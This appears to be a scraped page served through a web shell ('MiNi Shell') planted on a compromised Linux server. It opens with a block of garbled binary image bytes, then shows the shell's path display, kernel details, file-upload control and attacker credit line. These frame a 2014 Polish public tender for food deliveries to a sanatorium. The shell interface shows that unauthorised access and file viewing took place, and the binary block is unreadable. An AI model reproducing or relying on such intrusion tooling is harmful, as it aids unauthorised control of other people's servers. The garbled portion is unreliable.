JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140725/250148-N-2014.html

<p class="kh_header"><b>Sokołowsko: Dostawy artykułów  spożywczych do Spółki Sanatoria Dolnośląskie Sp. z o.o.</b><br>
<b>Numer ogłoszenia: 250148 - 2014; data zamieszczenia: 25.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sanatoria Dolnośląskie  sp. z o.o. , ul. Parkowa 3, 58-351 Sokołowsko, woj. dolnośląskie, tel. 74 8458240, faks 74 8458237.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sanatoria-dolnoslaskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów  spożywczych do Spółki Sanatoria Dolnośląskie Sp. z o.o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> zadanie 1

Fasola sucha op. 5kg, Groch suchy op. 5kg, Kasza gryczana op. 1 - 5 kg, Kasza jęczmienna  op.1kg, Kasza kukurydziana op. 1kg, Kasza jaglana op. 5kg, Kasza manna op. 1 kg., Makaron - forma gruba, świderki, muszelki, kolanka łazanki Op. 5 k, Makaron  nitki, PN A  74132Op. 5 kg, Mąka pszenna typ 450, np.  wrocławska,  1kg, Mąka pszenna typ 450, np. tortowa 1kg, Płatki kukurydziane smakowe kakaowe,miodowe 1kg, Płatki kukurydziane op. 1kg, Mąka ziemniaczana  op.1kg, Płatki ryżowe 0,5kg błyskawiczne, Płatki owsiane op. 1 kg, Ryż op. 1 kg

zadanie 2

Chrzan konserwowy, 900g, Fasolka czerwona konserwowa typu Rolnik 400g, po odcieku 240g , Kukurydza konserwowa w puszce 340g po odcieku, Groszek konserwowy typu Rolnik, Pudliszki, Vernet 400g, po odcieku 240 g, Ketchup 500ml Tortex łagodny, Koncentrat buraczany w płynie - op do. 300 ml., Koncentrat owocowy - syrop 0,5l, Koncentrat pomidorowy 30%   900 g pudliszki, Majonez   op.  330 g świdnicki, Majonez op. 900g Frubex, Majonez   op.  900 g Świdnicki, Margaryna dobrej gospodyni 250g, Margaryna na kanapki kubek 500g  typu Delma, Margaryna zwykła kostka 250g, Musztarda   op.  180 g, Ocet 10%  op. 1l,Ogórki konserwowe Fruktus 870g, Olej roślinny uniwersalny 1-5l, Papryka konserwowa  Fruktus 900g, Szczaw   op. 300g, Paprykarz szczeciński 330g, Śledź matias wiadro 2kg lub 4kg, Konserwa rybna śledź, makrela w oleju masa netto160g, Pasztet prochowicki160g, Tuńczyk w puszce/ konserwy rybne ok. 175 g

zadanie 3

Biszkopty ok.120g , Budyń bez cukru różne smaki 40g, Budyń różne smaki 1 kg, Ciastka   herbatniki  np. Petitki, Szkolne 100g, Wafle bez cukru , Cukier  op.1 kg, Cukier puder op. 500 g, Cukier waniliowy 20g, Dżem 1kg, Herbata ekspresowa   typu minutka torebka 100 szt., Herbata granulowana op. 200 g, Herbata owocowa 20szt op, Kakao naturalne op. 100 g, Kawa naturalna   rozpuszczalna granulowana  op. 0,2 kg. Typu nescafe, Kawa op.150 g INKA
Kawa zbożowa rozpuszczalna op.500 g, Kisiel , Kisiel bez cukru  1 kg truskawka, malina, cytryna typu Delecta, Kleik ryżowy 160g , Mleko w proszku odtłuszczone 25 kg, Mleko w proszku pełne 0,5 kg, Mleko w proszku pełne 25 kg,Sok owocowy 125ml typu kubuś smaki: marchew banan jabłko lub marchew jabłko sok pomidorowy 125ml ,Sok owocowo warzywny op. 1l smaki: marchew banan jabłko lub marchew jabłko, Suchary pszenne delikatesowe 285g bez cukru typu Mamut, Wafle 44g, różne smaki, typu Skawa, Grzesiek, Ciastka drobne kruche, kruche z dżemem,  wafelki chrupsy op. 2 kg

zadanie 4

Barszcz czerwony instant  Winiary, Knorr 3kg, Bazylia, oregano 10g , Cynamon mielony   20 g, Czosnek granulowany 20g, Kminek 20g , Koperek suszony 250g, Kwasek cytrynowy  20g, Liście laurowe 6g, Majeranek 20 g,Papryka mielona ostra 20g, Papryka mielona słodka 20g, Pieprz czarny naturalny mielony 1000 g, Pieprz ziołowy, mielony 20g, typu Euro Konkret, Cykoria, Przyprawa do zup w płynie ok.1000g (860ml) Knorr, Winiary, Przyprawa warzywna, min. 15% warzyw suszonych,  1 kg typu Warzywko, Rodzynki 100g,  Rosół drobiowy, w proszku, op. 1 kg Knorr, Sos bolones / napoli  Knorr op.1,1kg, Sos sałatkowy ogrodowy, grecki  op. 0,7 kg, Sól warzona - jodowana op.1 kg, Ziele angielskie 20g, Zupa pieczarkowa  Winiary 45g, Zupa Barszcz biały  Winiary 45g, Żelatyna spożywcza wieprzowa 1000 g, Żurek w proszku szt Winiary 

zadanie 5

Porzeczka czarna mrożona luzem 5 lub 7 kg, Brokuła mrożona luzem 5 lub 7 kg, Truskawki mrożone op. 5 kg-7 kg, Marchew mrożona luzem op. od 5 - 7 kg, Marchew z groszkiem mrożona 5-7 kg, Ryba mrożona dorsz (STH) , Ryba mrożona tilapia (STH) , Ryba mrożona miruna  (STH) , Fasolka szparagowa zielona cięta mrożona luzem op. od 5 lub 7 kg, Kalafior mrożony op. Luzem 5-7 kg, Mieszanka warzywna mrożona 5 cio składnikowa op. Luzem 5-7 kg, Szpinak mrożony 1 kg, Mieszanka kompotowa mrożona luzem  op. od 5-7 kg

zadanie 6
 
Bułka tarta 500g, Bułka z makiem 80 g, Bułka z serem 80 g, Bułki maślane 50g, Chleb mieszany pytlowy 600g, Chleb mieszany pytlowy krojony 600g, Chleb bezglutenowy krojony 440g, Chleb pszenny krojony 600g, Chleb razowy krojony 500g, Bułka grahamka 50g, Chleb tostowy duży krojony 600g, Graham, krojony 500g, Jagodzianka 80g, Kajzerka 50 g, Bułka śniadaniowa mini 50g, Pączek z różą 80 g, Rogal 50 g, Rogal św. Marcina, Sernik lany, Makowiec,, Babka czekoladowa, Keks, Murzynek

zadanie 7

ZOTT JOG.NAT.B/CUKRU 150g /180G, Jogurt grecki 400ml, ZOTT JOG.NAT.B/CUKRU 400G, Jogurt ale owoc 150g, JOGURT GRATKA115g, Jogurt zott jogobella 150 ml/ serek jana waniliowy lub hej, ZOTT JOGOBELLA  musli180g, jogurt z musem owocowym bakoma 120g,, Jogurt serduszko 125ml
KEFIR 450G, MASŁO EXTRA 200g, MASŁO MAZURSKIE EX.200g, MASŁO ŚMIETANKOWE 200g, Ser Hochland plastry 150g, Ser zott plastry 150g, Ser żółty wędzony, Ser żółty salami, salami smakowe, Ser żółty morski, Ser żółty gouda, MLEKO 2% 1L UHT, MLEKO 3.2%1L  UHT, MLEKO 2% FOLIA  1L,, Serek Hochland krążek 200g, Serek krążek lactima, tychy 140g, Serek Kiri 100g, Serek tartare 20g, Ser topiony tychy 100g, MARG.MLECZNA BIELMAR 250 g, SER TOP.60% TYCHY 100g, Ser camembert/ brie 120g, ZOTT ZOTTARELLA 125G, ŚMIET.12%/400g, ŚMIET.18%250g, ŚMIETANKA DO KAWY 10*10g, Serek kanapkowy sonrisa150G, TWARÓG PÓŁTŁUSTY (folia, próżnia)  1kg, TWARÓG PÓŁTŁUSTY(papier) 1kg, Serek do chleba 100g różne smaki, Ser feta 40%tł270g, FROMAGE GÓRSKI MIX 80g.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.33.11.00-9, 15.33.10.00-7, 15.33.14.60-9, 15.49.00.00-2, 15.61.00.00-7, 15.87.10.00-4, 15.86.10.00-1, 15.86.30.00-5, 15.81.10.00-6, 15.81.00.00-0, 15.51.10.00-3, 15.51.00.00-6, 15.53.00.00-2, 15.54.00.00-5, 15.55.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy o spełnianiu wymagań koniecznych do zapewnienia higieny w procesie produkcji lub obrocie oraz zapewnienia jakość zdrowotną produktów</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony przewidują możliwość dokonywania zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w każdym przypadku gdy konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub gdy zmiany te są korzystne dla Zamawiającego a także w przypadku wejścia w życie przepisów zmieniających wysokość stawki podatku VAT za poszczególne Produkty. Każda ze stron może odstąpić od umowy za 1 miesięcznym wypowiedzeniem nie wcześniej jednak niż przed 31.12.2014 r.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sanatoria-dolnoslaskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sanatoria Dolnośląskie Sp. z o.o. Parkowa 3, 58-351 Sokołowsko.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2014 godzina 10:00, miejsce: Sanatoria Dolnośląskie Sp. z o.o. Parkowa 3, 58-351 Sokołowsko - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com